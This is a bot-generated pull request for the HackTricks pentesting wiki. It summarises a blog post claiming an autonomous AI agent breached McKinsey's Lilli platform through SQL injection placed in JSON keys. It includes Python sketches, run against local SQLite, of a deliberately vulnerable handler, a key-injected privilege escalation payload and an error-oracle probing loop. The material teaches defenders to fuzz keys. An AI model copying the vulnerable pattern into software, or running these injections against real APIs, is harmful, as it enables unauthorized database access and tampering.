
How We Hacked McKinsey's AI Platform#1973

Open
carlospolop wants to merge 1 commit into master from
update_How_We_Hacked_McKinsey_s_AI_Platform_20260309_185218

Conversation

@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform
  • Blog Title: How We Hacked McKinsey's AI Platform
  • Suggested Section: Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)

🎯 Content Summary

Title/Context
McKinsey’s internal AI platform “Lilli” (launched 2023) provides chat, document analysis, and RAG/search across 100,000+ internal documents for 43,000+ employees (adopted by 70%+; 500,000+ prompts/month). The post claims an autonomous offensive agent (no credentials, no insider knowledge, no human-in-the-loop) achieved full read and write access to the production database within ~2 hours using only the exposed attac...

🔧 Technical Details

SQLi via JSON key/identifier injection
If an API builds SQL dynamically using user-controlled JSON object keys (field names) and concatenates them into the query string, parameterizing only the values does not prevent SQL injection. Attackers can place SQL fragments in the JSON key positions (identifier injection). This class of SQLi is commonly missed by scanners that only fuzz values, so testing must include fuzzing keys/field names and any server-side mapping that turns JSON object properties into SQL identifiers.
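The vulnerable pattern can be sketched as follows. This is a minimal illustration (not the actual Lilli code), using a hypothetical `vulnerable_update` handler: the JSON *values* are bound as parameters, but the JSON *keys* are concatenated straight into the SQL string, so SQL fragments placed in a key position execute as part of the query.

```python
import sqlite3

def vulnerable_update(db, user_id, payload):
    """Builds a SET clause from client-supplied JSON keys.
    Values are parameterized, but the KEYS are concatenated
    into the SQL string -- identifier injection."""
    columns = ", ".join(f"{key} = ?" for key in payload)  # keys unsanitized
    sql = f"UPDATE users SET {columns} WHERE id = ?"
    db.execute(sql, [*payload.values(), user_id])
    db.commit()

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
db.execute("INSERT INTO users VALUES (1, 'alice', 'user')")

# Benign request: scanner fuzzing only the VALUE finds nothing.
vulnerable_update(db, 1, {"name": "bob"})

# Malicious request: the SQL fragment lives in the KEY.
# Resulting query: UPDATE users SET role = 'admin', name = ? WHERE id = ?
vulnerable_update(db, 1, {"role = 'admin', name": "bob"})

print(db.execute("SELECT role FROM users WHERE id = 1").fetchone())  # ('admin',)
```

Note that no quoting tricks are needed in the value at all, which is exactly why value-only fuzzing misses this class: the injection point is the identifier, so key/field-name fuzzing must be part of the test plan.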

Error-based feedback loop to derive “query shape”
When the backend returns database errors that reflect attacker-controlled input (including JSON keys), those errors act as an oracle. An attacker can iterate: inject malformed syntax → read the error → infer where the input lands in SQL → refine payload. Repeating this across multiple requests can transition from blind probing to valid injected SQL and reliable data extraction.
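The feedback loop can be sketched as below. The `backend` function here is a hypothetical stand-in for an endpoint that concatenates a JSON key into a column position and reflects raw database errors to the client; the three probes show the malformed-input → read-error → refine-payload cycle.

```python
import sqlite3

def backend(json_key):
    """Hypothetical vulnerable endpoint: the JSON key lands in the
    SELECT column position and raw DB errors are reflected back."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE docs (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO docs VALUES (1, 'q3-strategy', 'secret')")
    try:
        rows = db.execute(f"SELECT {json_key} FROM docs").fetchall()
        return {"ok": True, "rows": rows}
    except sqlite3.Error as e:
        return {"ok": False, "error": str(e)}  # reflected error = oracle

# Probe 1: malformed syntax -- the parse error proves the key lands in SQL.
r1 = backend("'")
print(r1["error"])

# Probe 2: guess an identifier -- "no such column" vs. success maps the schema.
r2 = backend("nonexistent")
print(r2["error"])

# Probe 3: refined payload -- valid SQL in the identifier position extracts data.
r3 = backend("body")
print(r3["rows"])  # [('secret',)]
```

Each round of the loop narrows where the input sits in the query ("query shape"), turning what began as blind probing into deterministic, error-guided extraction.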

🤖 Agent Actions

Summary:
Added a new subsection on SQLi via JSON keys/identifier injection, error-based oracle usage, and why scanners miss key-fuzzing.
Added the blog URL to the References section.

Files updated:

  • src/pentesting-web/sql-injection/README.md

Tests:

  • Not run (not applicable).

If you want tweaks to wording or placement, tell me where you’d like it adjusted.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)".

Repository Maintenance:

  • MD Files Formatting: 954 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
